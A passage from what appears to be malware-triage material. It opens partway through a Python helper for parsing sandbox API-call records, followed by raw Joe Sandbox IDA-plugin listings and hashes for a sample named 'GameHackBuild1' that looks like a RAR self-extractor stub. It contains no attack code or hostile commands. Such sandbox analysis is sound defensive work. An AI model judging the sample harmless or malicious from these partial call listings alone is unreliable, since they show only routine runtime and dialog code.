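        return int(tok, 16)           # immediate exactly as the report prints it
    return tok                        # "?", "Function_XXXXXXXX", ".exe", ...

def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse one record's lines; headers such as 'APIs'/'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref"), m.group("sub")))
    return calls

# Assumed decoding table: (api, argument index) -> {value: symbolic name}.
_CONSTS = {
    ("GetWindow", 1): {2: "GW_HWNDNEXT", 5: "GW_CHILD"},
    ("GetSystemMetrics", 0): {8: "SM_CYDLGFRAME"},
    ("SendMessageW", 1): {0x80: "WM_SETICON", 0x172: "STM_SETIMAGE",
                          0x173: "STM_GETIMAGE", 0x435: "EM_EXLIMITTEXT",
                          0x443: "EM_SETBKGNDCOLOR"},
    ("SendDlgItemMessageW", 2): {0x172: "STM_SETIMAGE"},
}

def decode_arg(api: str, idx: int, value: Arg) -> str:
    """Symbolic name for a known constant, otherwise the raw value."""
    if isinstance(value, int):
        return _CONSTS.get((api, idx), {}).get(value, f"0x{value:08X}")
    return value

def api_sequence(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Render calls in listing order, e.g. for diffing functions across samples."""
    out = []
    for c in calls:
        if c.subcall_of and not include_subcalls:
            continue
        args = ", ".join(decode_arg(c.api, i, a) for i, a in enumerate(c.args))
        out.append(f"{c.module}!{c.api}({args})")
    return out

def imports_by_module(calls: List[ApiCall]) -> dict:
    """Which APIs the function (and its listed subcalls) reaches, per module."""
    mods = {}
    for c in calls:
        mods.setdefault(c.module, set()).add(c.api)
    return {m: sorted(v) for m, v in mods.items()}

if __name__ == "__main__":
    parsed = parse_api_lines(APIS_SAMPLE)
    for entry in api_sequence(parsed, include_subcalls=True):
        print(entry)
    print(imports_by_module(parsed))
```

Subcall lines are kept but excluded from the default sequence, because they describe the callee's behaviour rather than this function's own call sites; pass `include_subcalls=True` when you want the transitive view. The decoding table only covers constants that appear in this report's records, so extend it as you meet others.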
                                      APIs
                                      • _free.LIBCMT ref: 00A28EC5
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A28ED1
                                      • _free.LIBCMT ref: 00A28EDC
                                      • _free.LIBCMT ref: 00A28EE7
                                      • _free.LIBCMT ref: 00A28EF2
                                      • _free.LIBCMT ref: 00A28EFD
                                      • _free.LIBCMT ref: 00A28F08
                                      • _free.LIBCMT ref: 00A28F13
                                      • _free.LIBCMT ref: 00A28F1E
                                      • _free.LIBCMT ref: 00A28F2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: f02f305523842740d1773ce8c5ce248d5d6eafad7d278d32f11257950fc90ea1
                                      • Instruction ID: 3d40c14852f237b5ea911bafc1a5a7683984d5941de2ab226ae0cbc6dea4af66
                                      • Opcode Fuzzy Hash: f02f305523842740d1773ce8c5ce248d5d6eafad7d278d32f11257950fc90ea1
                                      • Instruction Fuzzy Hash: EA11A47650111DAFCB11FF58EA42CDA3BA5FF04350B5140E5BA088B62ADA35DA519B80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 0-2277559157
                                      • Opcode ID: d0418f7fa75b96f1fe6d291a1165462be033516c277b468617ba84e133b5336f
                                      • Instruction ID: 500d4a6cc01301ec7a95f3d98eb57c62b5e8771ae91b682b3faf4cfabf0dca6b
                                      • Opcode Fuzzy Hash: d0418f7fa75b96f1fe6d291a1165462be033516c277b468617ba84e133b5336f
                                      • Instruction Fuzzy Hash: E8F14A716043485BDB25EF34A9A9BFE7799AFD4300F08057DF8858F2C3DA659848C7A2
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1AD20
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A1AD47
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A1AD60
                                      • SetWindowTextW.USER32(?,?), ref: 00A1AD71
                                      • GetDlgItem.USER32(?,00000065), ref: 00A1AD7A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A1AD8E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A1ADA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A09448
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A0946B
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00A0948A
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      • _swprintf.LIBCMT ref: 00A09526
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • MoveFileW.KERNEL32(?,?), ref: 00A09595
                                      • MoveFileW.KERNEL32(?,?), ref: 00A095D5
                                      Strings
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                      • String ID: rtmp%d
                                      • API String ID: 2111052971-3303766350
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00A18F38
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A18F59
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00A18F80
                                      Strings
                                      Similarity
                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 4094277203-4209811716
                                      APIs
                                      • __aulldiv.LIBCMT ref: 00A10A9D
                                        • Part of subcall function 00A0ACF5: GetVersionExW.KERNEL32(?), ref: 00A0AD1A
                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A10AC0
                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A10AD2
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A10AE3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10AF3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10B03
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A10B3D
                                      • __aullrem.LIBCMT ref: 00A10BCB
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00A2F5A2,?,00000000,?,00000000,00000000), ref: 00A2EE6F
                                      • __fassign.LIBCMT ref: 00A2EEEA
                                      • __fassign.LIBCMT ref: 00A2EF05
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00A2EF2B
                                      • WriteFile.KERNEL32(?,?,00000000,00A2F5A2,00000000,?,?,?,?,?,?,?,?,?,00A2F5A2,?), ref: 00A2EF4A
                                      • WriteFile.KERNEL32(?,?,00000001,00A2F5A2,00000000,?,?,?,?,?,?,?,?,?,00A2F5A2,?), ref: 00A2EF83
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00A1C54A
                                      • _swprintf.LIBCMT ref: 00A1C57E
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • SetDlgItemTextW.USER32(?,00000066,00A4946A), ref: 00A1C59E
                                      • _wcschr.LIBVCRUNTIME ref: 00A1C5D1
                                      • EndDialog.USER32(?,00000001), ref: 00A1C6B2
                                      Strings
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                      • String ID: %s%s%u
                                      • API String ID: 2892007947-1360425832
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00A1964E
                                      • GetWindowRect.USER32(?,00000000), ref: 00A19693
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00A1972A
                                      • SetWindowTextW.USER32(?,00000000), ref: 00A19732
                                      • ShowWindow.USER32(00000000,00000005), ref: 00A19748
                                      Strings
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: RarHtmlClassName
                                      • API String ID: 3937224194-1658105358
                                      APIs
                                        • Part of subcall function 00A2BF79: _free.LIBCMT ref: 00A2BFA2
                                      • _free.LIBCMT ref: 00A2C003
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A2C00E
                                      • _free.LIBCMT ref: 00A2C019
                                      • _free.LIBCMT ref: 00A2C06D
                                      • _free.LIBCMT ref: 00A2C078
                                      • _free.LIBCMT ref: 00A2C083
                                      • _free.LIBCMT ref: 00A2C08E
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00A220C1,00A1FB12), ref: 00A220D8
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A220E6
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A220FF
                                      • SetLastError.KERNEL32(00000000,?,00A220C1,00A1FB12), ref: 00A22151
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 0-1718035505
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10D0D
                                        • Part of subcall function 00A0ACF5: GetVersionExW.KERNEL32(?), ref: 00A0AD1A
                                      • LocalFileTimeToFileTime.KERNEL32(?,00A10CB8), ref: 00A10D31
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A10D47
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A10D56
                                      • SystemTimeToFileTime.KERNEL32(?,00A10CB8), ref: 00A10D64
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10D72
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      APIs
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      APIs
                                      • GetLastError.KERNEL32(?,00A40F50,00A23E14,00A40F50,?,?,00A2388F,?,?,00A40F50), ref: 00A28FA9
                                      • _free.LIBCMT ref: 00A28FDC
                                      • _free.LIBCMT ref: 00A29004
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A29011
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A2901D
                                      • _abort.LIBCMT ref: 00A29023
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: afd198db45c5422fbc1a2a7ec460be585666380f09a89f6d1ed48f7c9901a2b6
                                      • Instruction ID: f1aec538fe24f2f71f3ca325bbeff44411fe3fe21c39bfafacdf07b842efc77a
                                      • Opcode Fuzzy Hash: afd198db45c5422fbc1a2a7ec460be585666380f09a89f6d1ed48f7c9901a2b6
                                      • Instruction Fuzzy Hash: 37F0C83650A6316BC615B37C7E0AF2B2A6A9BD1761F250134F515E2296EF28CD026115
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A1D2F2
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1D30C
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1D31D
                                      • TranslateMessage.USER32(?), ref: 00A1D327
                                      • DispatchMessageW.USER32(?), ref: 00A1D331
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A1D33C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: 9786fd8e297534231c776d34ede9e08d48ba51c782ef6ebb344ee05d2903f180
                                      • Instruction ID: b3374847ca0ab38d087a243fa344599c7eebd792b4d1974a27a08c1eb707c149
                                      • Opcode Fuzzy Hash: 9786fd8e297534231c776d34ede9e08d48ba51c782ef6ebb344ee05d2903f180
                                      • Instruction Fuzzy Hash: 3BF03C72A01519BBCF219BE1EC4CEDBBF7DEF52391F008012F606D6050D6758982C7A1
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 00A1C435
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CompareString_wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2548945186-3358265660
                                      • Opcode ID: 86ab50af6db0b89d4a3eef2aeeb456abba8e24eb9003cfbf0f79c0520ecdfa12
                                      • Instruction ID: 7b5bad4f2b608d3f57fb3535759326bc1b5ebdc757ec78cd82328447a9f888b2
                                      • Opcode Fuzzy Hash: 86ab50af6db0b89d4a3eef2aeeb456abba8e24eb9003cfbf0f79c0520ecdfa12
                                      • Instruction Fuzzy Hash: 02319272944209AADF21DBA4DC45EEF77BDEF14360F0040A6FA05D6090EBB09FC4CA50
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 00A1ADFD
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A1AE22
                                      • DeleteObject.GDI32(00000000), ref: 00A1AE54
                                      • DeleteObject.GDI32(00000000), ref: 00A1AE77
                                        • Part of subcall function 00A19E1C: FindResourceW.KERNEL32(00A1AE4D,PNG,?,?,?,00A1AE4D,00000066), ref: 00A19E2E
                                        • Part of subcall function 00A19E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E46
                                        • Part of subcall function 00A19E1C: LoadResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E59
                                        • Part of subcall function 00A19E1C: LockResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                      • String ID: ]
                                      • API String ID: 142272564-3352871620
                                      • Opcode ID: 9076b38d19a9e765c2acf133c8517e7221094217c84212ddd1f91d97ff1fbf0e
                                      • Instruction ID: 00836f947945a69276db2cbb95217949fa6e578dccc3fdbbea0841e8518f7e22
                                      • Opcode Fuzzy Hash: 9076b38d19a9e765c2acf133c8517e7221094217c84212ddd1f91d97ff1fbf0e
                                      • Instruction Fuzzy Hash: B0016236941621A7D710A7A4AC15BFF7B7AAF81B02F080020FD00A72D1CB728C66C2B2
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1CCDB
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A1CCF1
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A1CD05
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00A1CD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 836b21c7420733275bf0410640b3f29062ecaa7dc28681464b4a652849d4c847
                                      • Instruction ID: 7e13ab8d23934d609d427bad727152682367eef80d5c2f85f3556ff798479f7e
                                      • Opcode Fuzzy Hash: 836b21c7420733275bf0410640b3f29062ecaa7dc28681464b4a652849d4c847
                                      • Instruction Fuzzy Hash: 7A01B5322C47107ED511CBA4AD09FE77BACAB5A752F140411F345A60E0C6A29D5687A6
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A27573,?,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002), ref: 00A275E2
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A275F5
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A27573,?,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002,00000000), ref: 00A27618
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 7b8d44b894579eae8d762c9d6c443bf7f90f5b4a0f5ab3e6bc181abd2f67ab37
                                      • Instruction ID: c99bd9697fba82b6cc0c5313d34a3e6ea463966a45f877e28d8255639400e74e
                                      • Opcode Fuzzy Hash: 7b8d44b894579eae8d762c9d6c443bf7f90f5b4a0f5ab3e6bc181abd2f67ab37
                                      • Instruction Fuzzy Hash: 80F04F31A18618BBDF15DBE8DC09BEEBFB9EF04711F004169F805A6150DB708A81CA94
                                      APIs
                                        • Part of subcall function 00A10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                        • Part of subcall function 00A10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A0EB92
                                      • GetProcAddress.KERNEL32(00A481C0,CryptUnprotectMemory), ref: 00A0EBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: c1880c754447c46fd6ff5d7197608cbda139cc6a87e851873855d2260be3c5f8
                                      • Instruction ID: 9fee640c33cdce12159a617c24ec82f12264ffc56917aa17cc1fddfec3ceaab5
                                      • Opcode Fuzzy Hash: c1880c754447c46fd6ff5d7197608cbda139cc6a87e851873855d2260be3c5f8
                                      • Instruction Fuzzy Hash: 08E04672908751EECF20DF78AC18B42BAE46B1A701F04CC5EF4D6E3A80DAF5D5808B60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 8021f4f466445d57524970784afbd3e299d00299deb5facfc855b5ccde938890
                                      • Instruction ID: f236d9abddeca2466237514d67dc75834fb1b99bee7acbf58cd3e2cd46b55421
                                      • Opcode Fuzzy Hash: 8021f4f466445d57524970784afbd3e299d00299deb5facfc855b5ccde938890
                                      • Instruction Fuzzy Hash: 3341C332A003149FCB10DF7CD981A5EB7B6EF85714B1645A8E915EB281DB31EE01CB80
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00A2B619
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A2B63C
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A2B662
                                      • _free.LIBCMT ref: 00A2B675
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A2B684
                                      Memory Dump Source
